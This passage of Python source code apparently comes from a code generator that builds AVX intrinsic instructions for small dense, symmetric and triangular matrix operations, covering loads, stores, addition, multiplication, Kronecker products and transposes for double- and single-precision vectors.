# va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
# repva = mm256Permute2f128Pd(va, va, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
# dup = mm256ShufflePd(repva, repva, (0,0,0,0))
for i in range(nu):
vb = mm256LoadGd(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256MulPd(dup, vb), pc, range(nu))
instructions += [ instr ]
else:
if s1Params['bcast']:
dup = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
else:
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
repvb = mm256Permute2f128Pd(vb, vb, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
dup = mm256ShufflePd(repvb, repvb, (0,0,0,0))
if M*K == nu:
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256MulPd(va, dup), pc, range(nu))
instructions += [ instr ]
else:
# vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
# repvb = mm256Permute2f128Pd(vb, vb, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
# dup = mm256ShufflePd(repvb, repvb, (0,0,0,0))
for i in range(nu):
va = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256MulPd(va, dup), pc, range(nu))
instructions += [ instr ]
return instructions
def T(self, sParams, dParams, opts):
nu = 4
src, dst = sParams['nuM'], dParams['nuM']
sL, sR = sParams['nuML'], sParams['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: (" + str(N) + "x" + str(M) + ")^T") ]
if M*N == nu:
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(va, pc, range(nu))
instructions += [ instr ]
else:
va0 = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
va1 = mm256LoadGd(Pointer(src[sL.of(1),sR.of(0)]), range(nu))
va2 = mm256LoadGd(Pointer(src[sL.of(2),sR.of(0)]), range(nu))
va3 = mm256LoadGd(Pointer(src[sL.of(3),sR.of(0)]), range(nu))
tmp0 = mm256UnpackloPd(va0, va1)
tmp1 = mm256UnpackloPd(va2, va3)
tmp2 = mm256UnpackhiPd(va0, va1)
tmp3 = mm256UnpackhiPd(va2, va3)
col0 = mm256Permute2f128Pd(tmp0, tmp1, [0,0,1,0,0,0,0,0])
col1 = mm256Permute2f128Pd(tmp2, tmp3, [0,0,1,0,0,0,0,0])
col2 = mm256Permute2f128Pd(tmp0, tmp1, [0,0,1,1,0,0,0,1])
col3 = mm256Permute2f128Pd(tmp2, tmp3, [0,0,1,1,0,0,0,1])
pc0 = Pointer(dst[dL.of(0),dR.of(0)])
pc1 = Pointer(dst[dL.of(1),dR.of(0)])
pc2 = Pointer(dst[dL.of(2),dR.of(0)])
pc3 = Pointer(dst[dL.of(3),dR.of(0)])
instr0 = mm256StoreGd(col0, pc0, range(nu))
instr1 = mm256StoreGd(col1, pc1, range(nu))
instr2 = mm256StoreGd(col2, pc2, range(nu))
instr3 = mm256StoreGd(col3, pc3, range(nu))
instructions += [ instr0, instr1, instr2, instr3 ]
return instructions
class _Dbl4Storer(Storer):
def __init__(self):
super(_Dbl4Storer, self).__init__()
def storeMatrix(self, mParams):
src, dst = mParams['nuM'], mParams['m']
sL, sR = mParams['nuML'], mParams['nuMR']
dL, dR = mParams['mL'], mParams['mR']
M, N = mParams['M'], mParams['N']
isCompact = mParams['compact']
mStruct, mAccess = mParams['struct'], mParams['access']
instructions = []
nu = 4
instructions.append(Comment('AVX Storer:'))
if Matrix.testGeneral(mStruct, mAccess, M, N):
if M == 1 and N == 1:
pc = AddressOf(sa(dst[dL.of(0),dR.of(0)]))
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
instr = mm256StoreGd(va, pc,[0])
instructions += [ instr ]
elif (N == 1 and ((M <= nu and not isCompact) or (M < nu and isCompact))) or (M == 1 and N < nu):
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
horizontal = M==1
instr = mm256StoreGd(va, pc, range(max(M,N)), isCompact=isCompact, horizontal=horizontal)
instructions += [ instr ]
elif mAccess.intersect(Map("{[i,j]->[i,j]}")) == mAccess and ((M < nu and N < nu) or (M == nu and N > 1 and N < nu) or (M > 1 and M < nu and N == nu)):
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M) ]
vas = [ mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), range(nu)) for i in range(M) ]
instrs = [ mm256StoreGd(vas[i], pcs[i], range(N)) for i in range(M) ]
instructions += instrs
elif Symmetric.testLower(mStruct, mAccess, M, N):
# elif M == N and mAccess.intersect(Map("{[i,j]->[i,j]}")) != mAccess:
# if mAccess == Map("{[i,j]->[i,j]: j<=i}").union(Map("{[i,j]->[j,i]: j>i}")):
#LSymm
nuvs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), [0, 1, 2, 3], isCompact, zeromask=range(i+1, 4)) for i in range(M)]
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M)]
comm = Comment("4x4 -> %dx%d - %s" % (M, N, 'LowSymm'))
instrs = [mm256StoreGd(nuvs[i], pcs[i], range(i+1), isCompact) for i in range(M)]
instructions.extend([comm] + instrs)
elif Symmetric.testUpper(mStruct, mAccess, M, N):
# elif mAccess == Map("{[i,j]->[j,i]: j<i}").union(Map("{[i,j]->[i,j]: j>=i}")):
#USymm
nuvs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), [0, 1, 2, 3], isCompact, zeromask=range(0, i)) for i in range(M)]
pcs = [Pointer(dst[dL.of(i),dR.of(i)]) for i in range(M)]
comm = Comment("4x4 -> %dx%d - %s" % (M, N, 'UpSymm'))
instrs = [mm256StoreGd(nuvs[i], pcs[i], range(i,M), isCompact) for i in range(M)]
instructions.extend([comm] + instrs)
# elif len(mStruct) == 2:
# if Matrix in mStruct and ZeroMatrix in mStruct and M==N:
# if mStruct[Matrix] == Set("{[i,j]: 0<=i<"+str(M)+" and 0<=j<=i}") and mStruct[ZeroMatrix] == Set("{[i,j]: 0<=i<"+str(M)+" and i<j<"+str(M)+"}"):
elif LowerTriangular.test(mStruct, mAccess, M, N):
#LowerTriang
nuvs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), [0, 1, 2, 3], isCompact, zeromask=range(i+1, 4)) for i in range(M)]
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M)]
comm = Comment("4x4 -> %dx%d - %s" % (M, N, 'LowTriang'))
instrs = [mm256StoreGd(nuvs[i], pcs[i], range(i+1), isCompact) for i in range(M)]
instructions.extend([comm] + instrs)
elif UpperTriangular.test(mStruct, mAccess, M, N):
# elif mStruct[Matrix] == Set("{[i,j]: 0<=i<"+str(M)+" and i<=j<"+str(M)+"}") and mStruct[ZeroMatrix] == Set("{[i,j]: 0<=i<"+str(M)+" and 0<=j<i}"):
#UpperTriang
nuvs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), [0, 1, 2, 3], isCompact, zeromask=range(0, i)) for i in range(M)]
pcs = [Pointer(dst[dL.of(i),dR.of(i)]) for i in range(M)]
# pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M)]
comm = Comment("4x4 -> %dx%d - %s" % (M, N, 'UpTriang'))
instrs = [mm256StoreGd(nuvs[i], pcs[i], range(i,M), isCompact) for i in range(M)]
instructions.extend([comm] + instrs)
# elif (len(mStruct) == 1 and Matrix in mStruct) or (M!=N):
for i in instructions:
i.bounds.update(mParams['bounds'])
# if M == 1:
# if N < 4:
# pc = AddressOf(sa(dst[dL.of(0),dR.of(0)])) if N == 1 else Pointer(dst[dL.of(0),dR.of(0)])
# vmask = N*[1] + (4-N)*[0]
# va = mm256LoaduPd(Pointer(src[sL.of(0),sR.of(0)]),range(N,4))
# instr = mm256MaskstorePd(vmask, va, pc)
# instructions += [ Comment("1x4 -> 1x" + str(N) + " - Corner") ]
# instructions += [ instr ]
# elif M == 2:
# if N == 1:
# nuv = mm256LoaduPd(Pointer(src[sL.of(0),sR.of(0)]), [2,3])
# if isCompact:
# pc = Pointer(dst[dL.of(0),dR.of(0)])
# vmask = 2*[1] + 2*[0]
# instr = mm256MaskstorePd(vmask, nuv, pc)
# instructions += [ Comment("4x1 -> 2x1 - Compact") ]
# instructions += [ instr ]
# else:
# vmask = [1] + 3*[0]
# pc0 = Pointer(dst[dL.of(0),dR.of(0)])
# pc1 = Pointer(dst[dL.of(1),dR.of(0)])
# instr0 = mm256MaskstorePd(vmask, nuv, pc0)
# instr1 = mm256MaskstorePd(vmask, mm256ShufflePd(nuv, nuv, [0,0,0,1]), pc1)
# instructions += [ Comment("4x1 -> 2x1 - incompact") ]
# instructions += [ instr0, instr1 ]
# elif N == 2:
# nuv0 = mm256LoaduPd(Pointer(src[sL.of(0),sR.of(0)]), [2,3])
# nuv1 = mm256LoaduPd(Pointer(src[sL.of(1),sR.of(0)]), [2,3])
# if isCompact:
# pc = Pointer(dst[dL.of(0),dR.of(0)])
# v = mm256Permute2f128Pd(nuv0, nuv1, [0,0,1,0,0,0,0,0])
# instructions += [ Comment("4x4 -> 2x2 - Compact"), mm256StoreuPd(v, pc) ]
# else:
# vmask = 2*[1] + 2*[0]
# pc0 = Pointer(dst[dL.of(0),dR.of(0)])
# pc1 = Pointer(dst[dL.of(1),dR.of(0)])
# instr0 = mm256MaskstorePd(vmask, nuv0, pc0)
# instr1 = mm256MaskstorePd(vmask, nuv1, pc1)
# instructions += [ Comment("4x4 -> 2x2 - incompact") ]
# instructions += [ instr0, instr1 ]
# elif N == 3:
# nuv0 = mm256LoaduPd(Pointer(src[sL.of(0),sR.of(0)]), [3])
# nuv1 = mm256LoaduPd(Pointer(src[sL.of(1),sR.of(0)]), [3])
# if isCompact:
# pc0 = Pointer(dst[dL.of(0),dR.of(0)])
# pc1 = Pointer(dst[dL.of(1),dR.of(1)])
# t0 = mm256Permute2f128Pd(nuv1, nuv1, [0,0,0,0,0,0,0,1]) # 2nd lane <-> 1st
# t1 = mm256ShufflePd(nuv1, t0, [0,1,0,1])
# vmask = 2*[1] + 2*[0]
# instr0 = mm256StoreuPd(mm256BlendPd(nuv0, t1, [1,0,0,0]), pc0)
# instr1 = mm256MaskstorePd(vmask, t1, pc1)
# instructions += [ Comment("4x4 -> 2x3 - Compact") ]
# instructions += [ instr0, instr1 ]
# else:
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(2) ]
# vmask = 3*[1] + [0]
# instr0 = mm256MaskstorePd(vmask, nuv0, pcs[0])
# instr1 = mm256MaskstorePd(vmask, nuv1, pcs[1])
# instructions += [ Comment("4x4 -> 2x3 - incompact") ]
# instructions += [ instr0, instr1 ]
# elif N == 4:
# v0_3 = mm256LoaduPd(Pointer(src[sL.of(0),sR.of(0)]))
# v4_7 = mm256LoaduPd(Pointer(src[sL.of(1),sR.of(0)]))
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(2) ]
# instr0 = mm256StoreuPd(v0_3, pcs[0])
# instr1 = mm256StoreuPd(v4_7, pcs[1])
# instructions += [ Comment("4x4 -> 2x4") ]
# instructions += [ instr0, instr1 ]
# elif M == 3:
# if N == 1:
# nuv = mm256LoaduPd(Pointer(src[sL.of(0),sR.of(0)]), [3])
# if isCompact:
# vmask = 3*[1] + [0]
# pc = Pointer(dst[dL.of(0),dR.of(0)])
# instr = mm256MaskstorePd(vmask, nuv, pc)
# instructions += [ Comment("4x1 -> 3x1 - Compact") ]
# instructions += [ instr ]
# else:
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(3) ]
# vmask = [1] + 3*[0]
# instr0 = mm256MaskstorePd(vmask, nuv, pcs[0])
# instr1 = mm256MaskstorePd(vmask, mm256ShufflePd(nuv, nuv, [0,0,0,1]), pcs[1])
# instr2 = mm256MaskstorePd(vmask, mm256Permute2f128Pd(nuv, nuv, [1,0,0,0,0,0,0,1]), pcs[2])
# instructions += [ Comment("4x1 -> 3x1 - incompact") ]
# instructions += [ instr0, instr1, instr2 ]
# elif N == 2:
# nuvs = [ mm256LoaduPd(Pointer(src[sL.of(i),sR.of(0)]), [2,3]) for i in range(3) ]
# if isCompact:
# pc0 = Pointer(dst[dL.of(0),dR.of(0)])
# pc1 = Pointer(dst[dL.of(2),dR.of(0)])
# v = mm256Permute2f128Pd(nuvs[0], nuvs[1], [0,0,1,0,0,0,0,0])
# vmask = 2*[1] + 2*[0]
# instructions += [ Comment("4x4 -> 3x2 - Compact"), mm256StoreuPd(v, pc0), mm256MaskstorePd(vmask, nuvs[2], pc1) ]
# else:
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(3) ]
# vmask = 2*[1] + 2*[0]
# instructions += [ Comment("4x4 -> 3x2 - incompact") ]
# instructions += [ mm256MaskstorePd(vmask, nuvs[i], pcs[i]) for i in range(3) ]
# elif N == 3:
# nuvs = [ mm256LoaduPd(Pointer(src[sL.of(i),sR.of(0)]), [3]) for i in range(3) ]
# vmask = 3*[1] + [0]
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(3) ]
# instructions += [ Comment("4x4 -> 3x3 - (In)compact") ]
# instructions += [ mm256MaskstorePd(vmask, nuvs[i], pcs[i]) for i in range(3) ]
# elif N == 4:
# nuvs = [ mm256LoaduPd(Pointer(src[sL.of(i),sR.of(0)])) for i in range(3) ]
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(3) ]
# instructions += [ Comment("4x4 -> 3x4") ]
# instructions += [ mm256StoreuPd(nuvs[i], pcs[i]) for i in range(3) ]
# elif M == 4:
# if N == 1:
# if not isCompact:
# nuv = mm256LoaduPd(Pointer(src[sL.of(0),sR.of(0)]))
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4) ]
# vmask = [1] + 3*[0]
# instr0 = mm256MaskstorePd(vmask, nuv, pcs[0])
# instr1 = mm256MaskstorePd(vmask, mm256ShufflePd(nuv, nuv, [0,0,0,1]), pcs[1])
# invlane = mm256Permute2f128Pd(nuv, nuv, [1,0,0,0,0,0,0,1])
# instr2 = mm256MaskstorePd(vmask, invlane, pcs[2])
# instr3 = mm256MaskstorePd(vmask, mm256ShufflePd(invlane, invlane, [0,0,0,1]), pcs[3])
# instructions += [ Comment("4x1 -> 4x1 - incompact"), instr0, instr1, instr2, instr3 ]
# elif N < 4:
# nuvs = [ mm256LoaduPd(Pointer(src[sL.of(i),sR.of(0)]), range(N,4)) for i in range(4) ]
# vmask = N*[1] + (4-N)*[0]
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4) ]
# instrs = [ mm256MaskstorePd(vmask, nuvs[i], pcs[i]) for i in range(4) ]
# instructions += [ Comment("4x" + str(N) + " -> 4x4") ] + instrs
return instructions
class _Flt8Loader(Loader):
def __init__(self):
super(_Flt8Loader, self).__init__()
def loadMatrix(self, mParams):
nu=8
src, dst = mParams['m'], mParams['nuM']
sL, sR = mParams['mL'], mParams['mR']
dL, dR = mParams['nuML'], mParams['nuMR']
M, N = mParams['M'], mParams['N']
nuMM, nuMN = mParams['nuMM'], mParams['nuMN']
isCompact = mParams['compact']
instructions = [ ]
if M == 1 and N == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
# vmask = [1] + 7*[0]
pa = AddressOf(sa(src[sL.of(0),sR.of(0)]))
if mParams['bcast']:
va = mm256LoadGs(pa, [tuple(range(nu))])
else:
va = mm256LoadGs(pa, [0])
instr = mm256StoreGs(va, pc, range(nu))
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
elif (N == 1 and ((M <= nu and not isCompact) or (M < nu and isCompact))) or (M == 1 and N < nu):
pc = Pointer(dst[dL.of(0),dR.of(0)])
horizontal = M==1
pa = Pointer(src[sL.of(0),sR.of(0)])
va = mm256LoadGs(pa, range(max(M,N)), isCompact=isCompact, horizontal=horizontal)
instr = mm256StoreGs(va, pc, range(nu))
# else: # Incompact case should appear only for M>1 and N==1
# vmask = [1] + 7*[0]
# es = [ mm256MaskloadPs(Pointer(src[sL.of(i),sR.of(0)]), vmask) for i in range(M) ]
# if M == 2:
# instr = mm256StoreuPs(mm256UnpackloPs(es[0], es[1]), pc)
# elif M==3:
# t0 = mm256UnpackloPs(es[0], es[1])
# instr = mm256StoreuPs(mm256ShufflePs(t0, es[2], (1,0,1,0)), pc)
# elif M==4:
# t0 = mm256UnpackloPs(es[0], es[1])
# t1 = mm256UnpackloPs(es[2], es[3])
# instr = mm256StoreuPs(mm256ShufflePs(t0, t1, (1,0,1,0)), pc)
# elif M==5:
# t0 = mm256UnpackloPs(es[0], es[1])
# t1 = mm256UnpackloPs(es[2], es[3])
# t2 = mm256ShufflePs(t0, t1, (1,0,1,0))
# instr = mm256StoreuPs(mm256Permute2f128Ps(t2, es[4], [0,0,1,0,0,0,0,0]), pc)
# elif M==6:
# t0 = mm256UnpackloPs(es[0], es[1])
# t1 = mm256UnpackloPs(es[2], es[3])
# t2 = mm256ShufflePs(t0, t1, (1,0,1,0))
# t3 = mm256UnpackloPs(es[4], es[5])
# instr = mm256StoreuPs(mm256Permute2f128Ps(t2, t3, [0,0,1,0,0,0,0,0]), pc)
# elif M==7:
# t0 = mm256UnpackloPs(es[0], es[1])
# t1 = mm256UnpackloPs(es[2], es[3])
# t2 = mm256ShufflePs(t0, t1, (1,0,1,0))
# t3 = mm256UnpackloPs(es[4], es[5])
# t4 = mm256ShufflePs(t3, es[6], (1,0,1,0))
# instr = mm256StoreuPs(mm256Permute2f128Ps(t2, t4, [0,0,1,0,0,0,0,0]), pc)
# elif M==8:
# t0 = mm256UnpackloPs(es[0], es[1])
# t1 = mm256UnpackloPs(es[2], es[3])
# t2 = mm256ShufflePs(t0, t1, (1,0,1,0))
# t3 = mm256UnpackloPs(es[4], es[5])
# t4 = mm256UnpackloPs(es[6], es[7])
# t5 = mm256ShufflePs(t3, t4, (1,0,1,0))
# instr = mm256StoreuPs(mm256Permute2f128Ps(t2, t5, [0,0,1,0,0,0,0,0]), pc)
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
elif (M < nu and N < nu) or (M == nu and N > 1 and N < nu) or (M > 1 and M < nu and N == nu):
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu) ]
pas = [ Pointer(src[sL.of(i),sR.of(0)]) for i in range(M) ]
vas = [ mm256LoadGs(pas[i], range(N)) for i in range(M) ]
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ mm256StoreGs(vas[i], pcs[i], range(nu)) for i in range(M) ]
instructions += [ mm256StoreGs(mm256SetzeroPs(), pcs[i], range(nu)) for i in range(M,nu) ]
return instructions
class _Flt8BLAC(object):
def __init__(self):
super(_Flt8BLAC, self).__init__()
def Add(self, s0Params, s1Params, dParams, opts):
nu = 8
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(N) + " + " + str(M) + "x" + str(N)) ]
if M*N == nu:
va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(mm256AddPs(va, vb), pc, range(nu))
instructions += [ instr ]
elif M == nu and N == nu:
for i in range(M):
va = mm256LoadGs(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu))
vb = mm256LoadGs(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGs(mm256AddPs(va, vb), pc, range(nu))
instructions += [ instr ]
return instructions
def Mul(self, s0Params, s1Params, dParams, opts):
nu = 8
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, K, N = s0Params['nuMM'], s0Params['nuMN'], s1Params['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(K) + " * " + str(K) + "x" + str(N)) ]
if M == 1:
if N == 1:
va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
vmul = mm256MulPs(va, vb)
vper = mm256Permute2f128Ps(vmul, vmul, [1,0,0,0,0,0,0,1])
vadd0 = mm256AddPs(vmul, vper)
vshu0 = mm256ShufflePs(vadd0, mm256SetzeroPs(), [0,0,3,2])
vadd1 = mm256AddPs(vadd0, vshu0)
vble1 = mm256BlendPs(vadd1, mm256SetzeroPs(), [1]*7 + [0])
vshu1 = mm256ShufflePs(vadd1, mm256SetzeroPs(), [0,0,2,1])
vadd2 = mm256AddPs(vble1, vshu1)
instr = mm256StoreGs(vadd2, pc, range(nu))
instructions += [ instr ]
else:
vbs = [ mm256LoadGs(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu)) for i in range(nu) ]
va0s = [ mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(i)]), [tuple(range(nu))]) for i in range(nu) ]
adds = []
for i in range(0,nu,2):
mul0 = mm256MulPs(va0s[i], vbs[i])
mul1 = mm256MulPs(va0s[i+1], vbs[i+1])
adds.append( mm256AddPs(mul0, mul1) )
t0 = mm256AddPs(adds[0], adds[1])
t1 = mm256AddPs(adds[2], adds[3])
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(mm256AddPs(t0, t1), pc, range(nu))
instructions += [ instr ]
else:
if K == 1:
vas = [ mm256LoadGs(Pointer(src0[s0L.of(i),s0R.of(0)]), [tuple(range(nu))]) for i in range(nu) ]
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu) ]
instrs = [ mm256StoreGs(mm256MulPs(vas[i], vb), pcs[i], range(nu)) for i in range(nu) ]
instructions += instrs
else:
if N == 1:
vas = [ mm256LoadGs(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu)) for i in range(nu) ]
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
muls = [ mm256MulPs(vas[i], vb) for i in range(nu) ]
lane0s = [ mm256Permute2f128Ps(muls[i], muls[4+i], [0,0,1,0,0,0,0,0]) for i in range(nu//2) ]
lane1s = [ mm256Permute2f128Ps(muls[i], muls[4+i], [0,0,1,1,0,0,0,1]) for i in range(nu//2) ]
t0s = [ mm256HaddPs(lane0s[i], lane1s[i]) for i in range(nu//2) ]
t1s = [ mm256HaddPs(t0s[i], t0s[i+1]) for i in range(0,nu//2,2) ]
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(mm256HaddPs(t1s[0], t1s[1]), pc, range(nu))
instructions += [ instr ]
else:
vbs = [ mm256LoadGs(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu)) for i in range(nu) ]
for i in range(nu):
vais = [ mm256LoadGs(Pointer(src0[s0L.of(i),s0R.of(j)]), [tuple(range(nu))]) for j in range(nu) ]
adds = []
for j in range(0,nu,2):
mul0 = mm256MulPs(vais[j], vbs[j])
mul1 = mm256MulPs(vais[j+1], vbs[j+1])
adds.append( mm256AddPs(mul0, mul1) )
t0 = mm256AddPs(adds[0], adds[1])
t1 = mm256AddPs(adds[2], adds[3])
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGs(mm256AddPs(t0, t1), pc, range(nu))
instructions += [ instr ]
return instructions
def Kro(self, s0Params, s1Params, dParams, opts):
nu = 8
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
oM, oK, oN, oP = s0Params['M'], s0Params['N'], s1Params['M'], s1Params['N']
M, K, N, P = s0Params['nuMM'], s0Params['nuMN'], s1Params['nuMM'], s1Params['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(K) + " Kro " + str(N) + "x" + str(P)) ]
if oM*oK*oN*oP == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
instr = mm256StoreGs(mm256MulPs(va, vb), pc, range(nu))
instructions += [ instr ]
elif oM*oK == 1:
if s0Params['bcast']:
dup = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
else:
va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
repva = mm256Permute2f128Ps(va, va, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
dup = mm256ShufflePs(repva, repva, (0,0,0,0))
if N*P == nu:
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(mm256MulPs(dup, vb), pc, range(nu))
instructions += [ instr ]
else:
# va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
# repva = mm256Permute2f128Ps(va, va, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
# dup = mm256ShufflePs(repva, repva, (0,0,0,0))
for i in range(nu):
vb = mm256LoadGs(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGs(mm256MulPs(dup, vb), pc, range(nu))
instructions += [ instr ]
else:
if s1Params['bcast']:
dup = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
else:
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
repvb = mm256Permute2f128Ps(vb, vb, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
dup = mm256ShufflePs(repvb, repvb, (0,0,0,0))
if M*K == nu:
va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(mm256MulPs(va, dup), pc, range(nu))
instructions += [ instr ]
else:
# vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
# repvb = mm256Permute2f128Ps(vb, vb, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
# dup = mm256ShufflePs(repvb, repvb, (0,0,0,0))
for i in range(nu):
va = mm256LoadGs(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGs(mm256MulPs(va, dup), pc, range(nu))
instructions += [ instr ]
return instructions
def T(self, sParams, dParams, opts):
nu = 8
src, dst = sParams['nuM'], dParams['nuM']
sL, sR = sParams['nuML'], sParams['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: (" + str(N) + "x" + str(M) + ")^T") ]
if M*N == nu:
va = mm256LoadGs(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(va, pc, range(nu))
instructions += [ instr ]
else:
vas = [ mm256LoadGs(Pointer(src[sL.of(i),sR.of(0)]), range(nu)) for i in range(nu) ]
unplos = [ mm256UnpackloPs(vas[i], vas[i+1]) for i in range(0,nu,2) ]
unphis = [ mm256UnpackhiPs(vas[i], vas[i+1]) for i in range(0,nu,2) ]
trow0 = mm256ShufflePs(unplos[0], unplos[1], (1,0,1,0))
trow1 = mm256ShufflePs(unplos[0], unplos[1], (3,2,3,2))
trow2 = mm256ShufflePs(unphis[0], unphis[1], (1,0,1,0))
trow3 = mm256ShufflePs(unphis[0], unphis[1], (3,2,3,2))
trow4 = mm256ShufflePs(unplos[2], unplos[3], (1,0,1,0))
trow5 = mm256ShufflePs(unplos[2], unplos[3], (3,2,3,2))
trow6 = mm256ShufflePs(unphis[2], unphis[3], (1,0,1,0))
trow7 = mm256ShufflePs(unphis[2], unphis[3], (3,2,3,2))
newrows = [ mm256Permute2f128Ps(trow0, trow4, [0,0,1,0,0,0,0,0]) ]
newrows.append( mm256Permute2f128Ps(trow1, trow5, [0,0,1,0,0,0,0,0]) )
